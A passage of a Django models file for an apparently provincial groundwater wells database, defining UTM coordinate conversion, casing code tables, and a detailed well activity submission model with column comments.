"well_yield_unit_code":"Codes for the unit of measure that was used for the well yield. All codes except the U.S. Gallons per Minute has been retired as all data from April 2019 will be reported in U.S. Gallons per Minute. E.g of other codes that have been used in the past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.",
"yield_estimation_duration":"Total length of time that a well yield test took to complete, measured in hours.",
"yield_estimation_method_code":"Codes for the valid methods that can be used to estimate the well yield. E.g. Air Lifting, Bailing, Pumping, Other.",
"yield_estimation_rate":"Rate at which the well water was pumped during the well yield test, measured in US gallons per minute.",
}
@receiver(pre_save, sender=Well)
def update_utm(sender, instance, **kwargs):
if instance.geom and (-180 < instance.geom.x < 180): # only update utm when geom is valid
utm_zone = math.floor((instance.geom.x + 180) / 6) + 1
coord_transform = CoordTransform(SpatialReference(4326), SpatialReference(32600 + utm_zone))
utm_point = instance.geom.transform(coord_transform, clone=True)
instance.utm_zone_code = utm_zone
# We round to integers because easting/northing is only precise to 1m. The DB column is also an integer type.
instance.utm_easting = round(utm_point.x)
instance.utm_northing = round(utm_point.y)
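# Illustrative sketch of the conversion above (the coordinates are assumed example
# values, not taken from real data): a well at longitude -123.37 falls in UTM zone
# floor((-123.37 + 180) / 6) + 1 = 10, so the point is transformed from EPSG:4326
# to EPSG:32610 (WGS 84 / UTM zone 10N), and the resulting easting and northing are
# rounded to whole metres before being stored on the instance.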
class CasingMaterialCode(CodeTableModel):
"""
The material used for casing a well, e.g., Cement, Plastic, Steel.
"""
code = models.CharField(primary_key=True, max_length=10,
editable=False, db_column='casing_material_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'casing_material_code'
ordering = ['display_order', 'description']
db_table_comment = 'Describes the material that the casing is made of.'
def __str__(self):
return self.description
class CasingCode(CodeTableModel):
"""
Type of Casing used on a well
"""
code = models.CharField(primary_key=True, max_length=10,
editable=False, db_column='casing_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'casing_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the casing component (piping or tubing installed in a well) as either '
'production (inner tube), surface (outer tube), or open hole.')
def __str__(self):
return self.description
# TODO: This class needs to be moved to submissions.models (in order to do that, the fk references for a
# number of other models needs to be updated)
@reversion.register()
class ActivitySubmission(AuditModelStructure):
"""
Activity information on a Well submitted by a user.
Note on db_comments: db_comment properties on model columns are
overridden by the db_column_supplemental_comments provided below.
db_column_supplemental_comments provides an easier way for the DA to add/update
comments in bulk.
"""
filing_number = models.AutoField(primary_key=True)
activity_submission_guid = models.UUIDField(
primary_key=False, default=uuid.uuid4, editable=False)
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True, null=True,
db_comment=('The file number assigned to a particular well in the province\'s Groundwater '
'Wells and Aquifers application.'))
well_activity_type = models.ForeignKey(
'submissions.WellActivityCode', db_column='well_activity_code', on_delete=models.PROTECT,
null=True, verbose_name='Type of Work')
well_status = models.ForeignKey(
WellStatusCode, db_column='well_status_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Status',
db_comment=('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, Alteration,'
' Abandoned, Decommission.'))
well_publication_status = models.ForeignKey(
WellPublicationStatusCode, db_column='well_publication_status_code',
on_delete=models.PROTECT, verbose_name='Well Publication Status',
null=True, default='Published')
well_class = models.ForeignKey(
WellClassCode, blank=True, null=True, db_column='well_class_code',
on_delete=models.PROTECT, verbose_name='Well Class',
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering,'
' Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
well_subclass = models.ForeignKey(WellSubclassCode, db_column='well_subclass_guid',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Subclass')
intended_water_use = models.ForeignKey(
IntendedWaterUseCode, db_column='intended_water_use_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Intended Water Use',
db_comment=('The intended use of the water in a water supply well as reported by the driller at'
' time of work completion on the well. E.g. DOM, IRR, DWS, COM'))
# Driller responsible should be a required field on all submissions, but for legacy well
# information this may not be available, so we can't enforce this on a database level.
person_responsible = models.ForeignKey('registries.Person', db_column='person_responsible_guid',
on_delete=models.PROTECT,
verbose_name='Person Responsible for Drilling',
blank=True, null=True)
company_of_person_responsible = models.ForeignKey(
'registries.Organization', db_column='org_of_person_responsible_guid', on_delete=models.PROTECT,
verbose_name='Company of person responsible for drilling', null=True, blank=True)
driller_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Name of Person Who Did the Work')
consultant_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Name')
consultant_company = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Company')
# Work start & end date should be required fields on all submissions, but for legacy well
# information this may not be available, so we can't enforce this on a database level.
work_start_date = models.DateField(
verbose_name='Work Start Date', null=True, blank=True,
db_comment=('The date when an activity such as well construction, well alteration, or well '
'decommission was started.'))
work_end_date = models.DateField(
verbose_name='Work End Date', null=True, blank=True,
db_comment=('The date when an activity such as well construction, well alteration, or well '
'decommission was ended.'))
construction_start_date = models.DateField(
null=True, verbose_name="Construction Start Date",
db_comment='The date when well construction started.')
construction_end_date = models.DateField(
null=True, verbose_name="Construction Date",
db_comment='The date when well construction ended.')
alteration_start_date = models.DateField(
null=True, verbose_name="Alteration Start Date",
db_comment='The date when alteration on a well started.')
alteration_end_date = models.DateField(
null=True, verbose_name="Alteration Date")
decommission_start_date = models.DateField(
null=True, verbose_name="Decommission Start Date",
db_comment='The start date of when the well was decommissioned.')
decommission_end_date = models.DateField(
null=True, verbose_name="Decommission Date")
owner_full_name = models.CharField(
max_length=200, verbose_name='Owner Name', blank=True, null=True)
owner_mailing_address = models.CharField(
max_length=100, verbose_name='Mailing Address', blank=True, null=True)
owner_city = models.CharField(
max_length=100, verbose_name='Town/City', blank=True, null=True)
owner_province_state = models.ForeignKey(
ProvinceStateCode, db_column='province_state_code', on_delete=models.PROTECT, verbose_name='Province',
blank=True, null=True)
owner_postal_code = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Postal Code')
owner_email = models.EmailField(
null=True, blank=True, verbose_name='Email address')
owner_tel = models.CharField(
null=True, blank=True, max_length=25, verbose_name='Telephone number')
street_address = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Street Address')
city = models.CharField(max_length=50, blank=True, null=True,
verbose_name='Town/City')
legal_lot = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Lot')
legal_plan = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Plan')
legal_district_lot = models.CharField(
max_length=20, blank=True, null=True, verbose_name='District Lot')
legal_block = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Block')
legal_section = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Section')
legal_township = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Township')
legal_range = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Range')
land_district = models.ForeignKey(LandDistrictCode, db_column='land_district_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Land District')
legal_pid = models.PositiveIntegerField(
blank=True, null=True, verbose_name='PID')
well_location_description = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Well Location Description',
db_comment=('Descriptive details of a well\'s location. E.g. the well is located 20\' south west '
'of the house; or the well is located in the pump house near the pond.'))
identification_plate_number = models.PositiveIntegerField(
blank=True, null=True, verbose_name='Identification Plate Number',
db_comment=('Steel plate with a unique number that is attached to required wells under the '
'groundwater protection regulations such as water supply wells, recharge or injection '
'wells made by drilling or boring, and permanent dewatering wells.'))
well_identification_plate_attached = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Well Identification Plate Is Attached',
db_comment=('Description of where the well identification plate has been attached on or near the '
'well.'))
id_plate_attached_by = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Well identification plate attached by')
# Contains Well Longitude and Latitude in that order
# Values are BC Albers elsewhere, but we are using WGS 84 lat/lon here to avoid rounding errors
geom = models.PointField(
blank=True, null=True, verbose_name='Geo-referenced Location of the Well', srid=4326)
coordinate_acquisition_code = models.ForeignKey(
CoordinateAcquisitionCode, blank=True, null=True, verbose_name="Location Accuracy Code",
db_column='coordinate_acquisition_code', on_delete=models.PROTECT,
db_comment=('Codes for the accuracy of the coordinate position, which is best estimated based on'
' the information provided by the data submitter and analysis done by staff. E.g. A,'
' B, C.'))
ground_elevation = models.DecimalField(
max_digits=10, decimal_places=2, blank=True, null=True, verbose_name='Ground Elevation')
ground_elevation_method = models.ForeignKey(GroundElevationMethodCode,
db_column='ground_elevation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Elevation Determined By')
drilling_methods = models.ManyToManyField(DrillingMethodCode, verbose_name='Drilling Methods',
blank=True)
well_orientation = models.BooleanField(null=True, verbose_name='Orientation of Well', choices=(
(True, 'vertical'), (False, 'horizontal')))
well_orientation_status = models.ForeignKey(WellOrientationCode, db_column='well_orientation_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Orientation Code')
water_supply_system_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Name',
db_comment=('Name or identifier given to a well that serves as a water supply system. Often, the '
'name is a reflection of the community or system it serves, e.g. Town of Osoyoos or '
'Keremeos Irrigation District.'))
water_supply_system_well_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Well Name',
db_comment=('The specific name given to a water supply system well. Often, the name reflects which '
'well it is within the system, e.g. Well 1 or South Well'))
surface_seal_material = models.ForeignKey(SurfaceSealMaterialCode, db_column='surface_seal_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Material')
surface_seal_depth = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Surface Seal Depth')
surface_seal_thickness = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Surface Seal Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
surface_seal_method = models.ForeignKey(SurfaceSealMethodCode, db_column='surface_seal_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Installation Method')
backfill_above_surface_seal = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Backfill Material Above Surface Seal')
backfill_above_surface_seal_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Backfill Depth')
backfill_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Backfill Depth',
db_comment='The depth in feet of any backfill placed above the surface seal of a well.')
backfill_type = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Backfill Material Above Surface Seal',
db_comment=('Indicates the type of backfill material that is placed above the surface seal'
' during the construction or alteration of well.'))
liner_material = models.ForeignKey(LinerMaterialCode, db_column='liner_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Liner Material')
liner_diameter = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner Diameter',
validators=[MinValueValidator(Decimal('0.00'))])
liner_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Liner Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
liner_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner From',
validators=[MinValueValidator(Decimal('0.00'))])
liner_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner To', validators=[MinValueValidator(Decimal('0.01'))])
screen_intake_method = models.ForeignKey(ScreenIntakeMethodCode, db_column='screen_intake_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Intake')
screen_type = models.ForeignKey(ScreenTypeCode, db_column='screen_type_code',
on_delete=models.PROTECT, blank=True, null=True, verbose_name='Type')
screen_material = models.ForeignKey(ScreenMaterialCode, db_column='screen_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Material')
other_screen_material = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Material')
screen_opening = models.ForeignKey(ScreenOpeningCode, db_column='screen_opening_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Opening')
screen_bottom = models.ForeignKey(ScreenBottomCode, db_column='screen_bottom_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Bottom')
other_screen_bottom = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Bottom')
screen_information = models.CharField(
max_length=300, blank=True, null=True, verbose_name="Screen Information"
)
filter_pack_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack From',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack To',
validators=[MinValueValidator(Decimal('0.01'))])
filter_pack_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Filter Pack Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_material = models.ForeignKey(FilterPackMaterialCode, db_column='filter_pack_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material')
filter_pack_material_size = models.ForeignKey(FilterPackMaterialSizeCode,
db_column='filter_pack_material_size_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material Size')
development_methods = models.ManyToManyField(DevelopmentMethodCode, blank=True,
verbose_name='Development Methods')
development_hours = models.DecimalField(max_digits=9, decimal_places=2, blank=True, null=True,
verbose_name='Development Total Duration',
validators=[MinValueValidator(Decimal('0.00'))])
development_notes = models.CharField(
max_length=255, blank=True, null=True, verbose_name='Development Notes')
water_quality_characteristics = models.ManyToManyField(
WaterQualityCharacteristic, db_table='activity_submission_water_quality', blank=True,
verbose_name='Obvious Water Quality Characteristics')
water_quality_colour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Colour')
water_quality_odour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Odour')
total_depth_drilled = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Total Depth Drilled')
finished_well_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Finished Well Depth',
db_comment=('The depth at which the well was \'finished\'. It can be shallower than the total well '
'depth which is the total depth at which the well was drilled. The finished depth is '
'represented in units of feet bgl (below ground level).'))
final_casing_stick_up = models.DecimalField(
max_digits=6, decimal_places=3, blank=True, null=True, verbose_name='Final Casing Stick Up')
bedrock_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Depth to Bedrock')
static_water_level = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Static Water Level (BTOC)',
db_comment=('The level (depth below ground) to which water will naturally rise in a well without '
'pumping, measured in feet.'))
well_yield = models.DecimalField(
max_digits=8, decimal_places=3, blank=True, null=True, verbose_name='Estimated Well Yield')
artesian_flow = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Flow',
db_comment=('Measurement of the artesian well\'s water flow that occurs naturally due to'
' inherent water pressure in the well. Pressure within the aquifer forces the'
' groundwater to rise above the land surface naturally without using a pump. Flowing'
' artesian wells can flow on an intermittent or continuous basis. Measured in US'
' Gallons/minute.'))
artesian_pressure = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of'
' construction. Measured in PSI (pounds per square inch).'))
artesian_pressure_head = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure head',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of '
'construction. Measured in ft agl (feet above ground level).'))
artesian_conditions = models.BooleanField(null=True, verbose_name='Artesian Conditions',
db_comment=('Artesian conditions arise when there is a movement of '
'groundwater from a recharge area under a confining '
'formation to a point of discharge at a lower elevation. '
'An example of this is a natural spring, or in the '
'example of the drilling industry, a flowing water well.'))
well_cap_type = models.CharField(
max_length=40, blank=True, null=True, verbose_name='Well Cap Type')
well_disinfected = models.BooleanField(null=True, verbose_name='Well Disinfected?',
choices=((False, 'No'), (True, 'Yes')))
well_disinfected_status = models.ForeignKey(WellDisinfectedCode, db_column='well_disinfected_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Disinfected Code')
comments = models.CharField(max_length=3000, blank=True, null=True)
internal_comments = models.CharField(
max_length=3000, blank=True, null=True)
alternative_specs_submitted = models.BooleanField(
null=True,
verbose_name='Alternative specs submitted (if required)', choices=((False, 'No'), (True, 'Yes')))
well_yield_unit = models.ForeignKey(
WellYieldUnitCode, db_column='well_yield_unit_code', on_delete=models.PROTECT, blank=True, null=True)
# TODO: convert to an integer field in the future
diameter = models.CharField(max_length=9, blank=True, null=True)
ems = models.CharField(max_length=30, blank=True, null=True)
# Observation well details
observation_well_number = models.CharField(
max_length=30, blank=True, null=True, verbose_name="Observation Well Number",
db_comment=('A unique number assigned to a well that has been included as part '
'of the Provincial Groundwater Observation Well Network.'))
observation_well_status = models.ForeignKey(
ObsWellStatusCode, db_column='obs_well_status_code', blank=True, null=True,
verbose_name="Observation Well Status", on_delete=models.PROTECT,
db_comment=('Status of an observation well within the Provincial Groundwater Observation Well '
'Network. I.e. Active is a well that is currently being used to collect groundwater '
'information, and inactive is a well that is no longer being used to collect '
'groundwater information.'))
# aquifer association
aquifer = models.ForeignKey(
'aquifers.Aquifer', db_column='aquifer_id', on_delete=models.PROTECT, blank=True,
null=True, verbose_name='Aquifer ID Number',
db_comment=('System generated unique sequential number assigned to each mapped aquifer. The'
' aquifer_id identifies which aquifer a well is in. An aquifer can have multiple'
' wells, while a single well can only be in one aquifer.'))
# Decommission info
decommission_reason = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Reason for Decommission")
decommission_method = models.ForeignKey(
DecommissionMethodCode, db_column='decommission_method_code', blank=True, null=True,
verbose_name="Method of Decommission", on_delete=models.PROTECT)
decommission_sealant_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Sealant Material")
decommission_backfill_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Backfill Material")
decommission_details = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Decommission Details")
# Aquifer related data
aquifer_vulnerability_index = models.DecimalField(
max_digits=10, decimal_places=0, blank=True, null=True, verbose_name='AVI')
storativity = models.DecimalField(
max_digits=8, decimal_places=7, blank=True, null=True, verbose_name='Storativity')
transmissivity = models.DecimalField(
max_digits=30, decimal_places=10, blank=True, null=True, verbose_name='Transmissivity')
hydraulic_conductivity = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Hydraulic Conductivity')
specific_storage = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Specific Storage')
specific_yield = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Specific Yield')
testing_method = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Testing Method')
testing_duration = models.PositiveIntegerField(blank=True, null=True)
analytic_solution_type = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Analytic Solution Type')
boundary_effect = models.ForeignKey(BoundaryEffectCode, db_column='boundary_effect_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Boundary Effect',
db_comment='Valid codes for the boundaries observed in '
'pumping test analysis. i.e. CH, NF.')
aquifer_lithology = models.ForeignKey(
AquiferLithologyCode, db_column='aquifer_lithology_code', blank=True, null=True,
on_delete=models.PROTECT,
verbose_name="Aquifer Lithology")
# Production data related data
yield_estimation_method = models.ForeignKey(
YieldEstimationMethodCode, db_column='yield_estimation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Estimation Method')
yield_estimation_rate = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='Estimation Rate',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
yield_estimation_duration = models.DecimalField(
max_digits=9, decimal_places=2, verbose_name='Estimation Duration',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.01'))])
static_level_before_test = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='SWL Before Test',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.0'))])
drawdown = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
hydro_fracturing_performed = models.BooleanField(
null=True,
verbose_name='Hydro-fracturing Performed?',
choices=((False, 'No'), (True, 'Yes')))
hydro_fracturing_yield_increase = models.DecimalField(
max_digits=7, decimal_places=2,
verbose_name='Well Yield Increase Due to Hydro-fracturing',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_depth = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump depth',
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_rate = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump rate',
validators=[MinValueValidator(Decimal('0.00'))])
class Meta:
db_table = 'activity_submission'
db_table_comment = 'Submission of data and information related to groundwater wells.'
db_column_supplemental_comments = {
"alternative_specs_submitted":"Indicates if an alternative specification was used for siting of a water supply well, or a permanent dewatering well, or for the method used for decommissioning a well.",
"analytic_solution_type":"Mathematical formulation used to estimate hydraulic parameters.",
"aquifer_id":"System generated sequential number assigned to each aquifer. It is widely used by groundwater staff as it is the only consistent unique identifier for a mapped aquifer. It is also commonly referred to as Aquifer Number.",
"artesian_conditions": "Artesian conditions arise when there is a movement of groundwater from a recharge area under a confining formation to a point of discharge at a lower elevation. An example of this is a natural spring, or in the example of the drilling industry, a flowing water well.",
"aquifer_lithology_code":"Valid codes for the type of material an aquifer consists of. i.e., Unconsolidated, Bedrock, Unknown.",
"aquifer_vulnerability_index":"Valid codes that Indicate the aquifer’s relative intrinsic vulnerability to impacts from human activities at the land surface. Vulnerability is based on: the type, thickness, and extent of geologic materials above the aquifer, depth to water table (or to top of confined aquifer), and type of aquifer materials. E.g. H, L, M",
"bedrock_depth":"Depth below ground level at which bedrock starts, measured in feet.",
"boundary_effect_code":"Valid codes for the boundaries observed in pumping test analysis. i.e. CH, NF.",
"city":"The city or town in which the well is located as part of the well location address.",
"comments":"Free form text used by the user (driller or staff) to include comments for the well. ",
"consultant_company":"Name of consultant company that was involved in the construction, alteration, or decommision of a well.",
"consultant_name":"Name of consultant (person) that was involved in the construction, alteration, or decommision of a well.",
"decommission_backfill_material":"Backfill material used to decommission a well. ",
"decommission_details":"Information about the decommissioning of a well as provided by the driller.",
"decommission_method_code":"Valid code for the method used to fill the well to close it permanently.",
"decommission_reason":"The reason why the well was decomssioned as provided by the driller.",
"decommission_sealant_material":"Describes the sealing material or a mixture of the sealing material used to decommission a well.",
"development_hours":"Total hours devoted to developing as well ('develop' in relation to a well, means remove from an aquifer the fine sediment and other organic or inorganic material that immediately surrounds the well screen, the drill hole or the intake area at the bottom of the well)",
"development_notes":"Information about the development of the well.",
"drawdown":"Drawdown is the drop in water level when water is being pumped. ",
"filter_pack_from":"The starting depth below ground level at which the filter pack was placed.",
"filter_pack_material_code":"Codes for the materials used in the filter pack, which are placed in the annulus of the well between the borehole wall and the well screen, and are used to settle-out fine grained particles that may otherwise enter the well. I.e. Fine gravel, very course sand, very fine gravel, other",
"filter_pack_material_size_code":"Codes for the sizes of the material used to pack a well filter. E.g. 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.",
"filter_pack_thickness":"The thickness in inches of the filter pack material used for a well.",
"filter_pack_to":"The end depth below ground level at which the filter pack was placed.",
"final_casing_stick_up":"The length of the production casing in the well that is above the surface of the ground adjacent to the well, or the floor of the well sump, pump house or well pit.",
"geom":"Estimated point location of the well. All UTM coordinates are converted to this geom column for storage and display. The geometry of the well should be considered aong with the coordinate acquisition code to get the estimated accuracy of the location.",
"ground_elevation":"The elevation above sea-level at the ground-level of the well, measured in feet.",
"ground_elevation_method_code":"Code for method used to determine the ground elevation of a well. E.g. GPS, Altimeter, Differential GPS, Level, 1:50,000 map, 1:20,000 map.",
"hydraulic_conductivity":"The ability of the rock or unconsolidated material to transmit water.",
"hydro_fracturing_performed":"Indicates if high pressure water was injected into the well to help break apart the bedrock in order to get more water out of the well.",
"hydro_fracturing_yield_increase":"How much the well yeild increases once hydro fracturing was performed, measured in US gallons per minute.",
"id_plate_attached_by":"The person who attached the id plate to the well.",
"intended_water_use_code":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g, DOM, IRR, DWS, COM, UNK, OTHER",
"internal_comments":"Staff only comments and information related to the well, and for internal use only, not to be made public.",
"land_district_code":"Codes used to identify legal land district used to help identify the property where the well is located. E.g. Alberni, Barclay, Cariboo.",
"legal_pid":"A Parcel Identifier or PID is a nine-digit number that uniquely identifies a parcel in the land title register of in BC. The Registrar of Land Titles assigns PID numbers to parcels for which a title is being entered in the land title register as a registered title. The Land Title Act refers to the PID as “the permanent parcel identifier”.",
"liner_diameter":"Diameter of the liner placed inside the well. Measured in inches.",
"liner_from":"Depth below ground level at which the liner starts inside the well. Measured in feet.",
"liner_material_code":"Code that describes the material noted for lithology. E.g. Rock, Clay, Sand, Unspecified,",
"liner_thickness":"Thickness of the liner inside the well. Measured in inches.",
"liner_to":"Depth below ground level at which the liner ends inside the well. Measured in feet.",
"other_screen_bottom":"Describes the type of bottom installed on a well screen of when the bottom type is different from all the types in the screen bottom drop down list and the data submitter picks 'Other ' from the list.",
"other_screen_material":"Describes the material that makes up the screen on a well when the material is different from all the drop down options and the data submitter picks 'Other ' from the list.",
"owner_city":"City where the owner of the well resides.",
"owner_email":"Email address of the well owner, not to be published to the public. ",
"owner_full_name":"First name and last name of the well owner. ",
"owner_mailing_address":"Street name and number of the well owner.",
"owner_postal_code":"Postal code of the well owner attached to the owner mailing address.",
"owner_tel":"Telephone number for the well owner, not to be published to the public.",
"province_state_code":"Province or state code used for the mailing address for the company",
"recommended_pump_depth":"Depth of the a pump placed within the well, as recommended by the well driller or pump installer, measured in feet below depth of the production casing.",
"recommended_pump_rate":"The rate at which to withdraw water from the well as recommended by the well driller or pump installer, measured in US gallons per minute.",
"screen_bottom_code":"Valid categories used to identify the type of bottom on a well screen. It provides for a standard commonly understood code and description for screen bottoms. Some examples include: Bail, Plate, Plug. 'Other' can also be specified.",
"screen_information":"Information about the screen that is not captured elsewhere, as provided by the well driller.",
"screen_intake_method_code":"Valid categories used to identify the type of intake mechanism for a well screen. It provides for a standard commonly understood code and description for screen intake codes. Some examples include: Open bottom, Screen, Uncased hole.",
"screen_material_code":"Describes the different materials that makes up the screen on a well. E.g. Plastic, Stainless Steel, Other.",
"screen_opening_code":"Valid categories used to identify the type of opening on a well screen. It provides for a standard commonly understood code and description for screen openings. E.g. Continuous Slot, Perforated Pipe, Slotted.",
"screen_type_code":"Valid categories for the type of well screen installed in a well. i.e. Pipe size, Telescope, Other",
"specific_storage":"The volume of water that the aquifer releases from storage, per volume per aquifer of hydraulic unit head.",
"static_level_before_test":"Resting static water level prior to pumping, measured in feet below ground level.",
"storativity":"The storativity (or storage coefficient ) is the amount of water stored or released per unit area of aquifer given unit change in head. ",
"street_address":"Street address for where the property that the well is physically located on.",
"surface_seal_depth":"The depth at the bottom of the surface seal, measured in feet.",
"surface_seal_material_code":"Valid materials used for creating the surface seal for a well. A surface seal is a plug that prevents surface runoff from getting into the aquifer or well and contaminating the water. E.g. Bentonite clay, Concrete grout, Sand cement grout, Other.",
"surface_seal_method_code":"Valid methods used to create the surface seal for a well. i.e. Poured, Pumped, Other.",
"surface_seal_thickness":"The thickness of the surface sealant placed in the annular space around the outside of the outermost well casing, measured in inches.",
"total_depth_drilled":"Total depth of drilling done when constructing or altering a well. It is different from the finished well depth which can be shallower than the total well depth. Measured in feet.",
"transmissivity":"Transmissivity is the rate of flow under a unit hydraulic gradient through a unit width of aquifer of thickness ",
"water_quality_odour":"Description of the odour of the water as recorded at time of work.",
"well_cap_type":"Description of the type of well cap used on the well.",
"well_disinfected":"Indicates if the well was disinfected after the well construction or alteration was completed.",
"well_orientation":"Describes the physical orientation of a well as being either horizontal or vertical.",
"well_publication_status_code":"Codes that describe if a well record is published for public consumption or unpublished and not available to the public due to data duplication and other data quality issues.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
"well_yield":"An approximate estimate of the capacity of the well to produce groundwater. Estimated by the well driller during construction by conducting a well yield test. Measured in US Gallons/minute.",
"well_yield_unit_code":"Codes for the unit of measure that was used for the well yield. All codes except the U.S. Gallons per Minute has been retired as all data from April 2019 will be reported in U.S. Gallons per Minute. E.g of other codes that have been used in the past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.",
"yield_estimation_duration":"Total length of time that a well yield test took to complete, measured in hours.",
"yield_estimation_method_code":"Codes for the valid methods that can be used to estimate the yield of a well. E.g. Air Lifting, Bailing, Pumping, Other.",
"yield_estimation_rate":"Rate at which the well water was pumped during the well yield test, measured in US gallons per minute.",
}
def __str__(self):
if self.filing_number:
return '%s %d %s %s' % (self.activity_submission_guid, self.filing_number,
self.well_activity_type.code, self.street_address)
else:
return '%s %s' % (self.activity_submission_guid, self.street_address)
def latitude(self):
if self.geom:
return self.geom.y
else:
return None
def longitude(self):
if self.geom:
return self.geom.x
else:
return None
def save(self, *args, **kwargs):
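# Backfill audit timestamps when the caller has not already set them;
# create_date is only populated the first time the record is inserted.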
if not self.update_date:
self.update_date = timezone.now()
if self._state.adding is True:
if not self.create_date:
self.create_date = timezone.now()
return super().save(*args, **kwargs)
class FieldsProvided(models.Model):
""" Fields that were filled out in a submission report or staff edit.
